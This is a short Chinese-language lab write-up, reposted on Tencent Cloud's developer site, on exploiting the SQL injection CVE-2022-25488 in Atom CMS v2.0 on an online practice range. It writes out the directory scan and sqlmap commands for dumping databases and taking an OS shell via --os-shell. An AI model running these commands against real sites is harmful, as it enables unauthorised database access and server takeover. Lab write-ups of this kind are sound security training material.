CVE-2022-25488
简介
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。
本人使用春秋云境免费靶场在线搭建。
详解
- 直接访问网址,跳转
/home路径,而且报错。
- 使用
dirsearch工具扫描路径,发现有个/admin/uploads.php路径。访问路径。
- 页面返回
mysql报错信息,而且有个where id=,尝试参数id=1访问。
id传过去了,而且没有mysql报错信息。尝试使用sqlmap注入。- 使用SQLmap注入,
id存在注入点。是报错注入和时间盲注。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 
- 查看所有数据库,发现没有
flag数据库(一般flag都会存在flag数据库中)。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --dbsflag应该是在根目录下flag文件中,使用sqlmap获取shell。成功获取flag。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --os-shell
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-06-11,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
腾讯云开发者
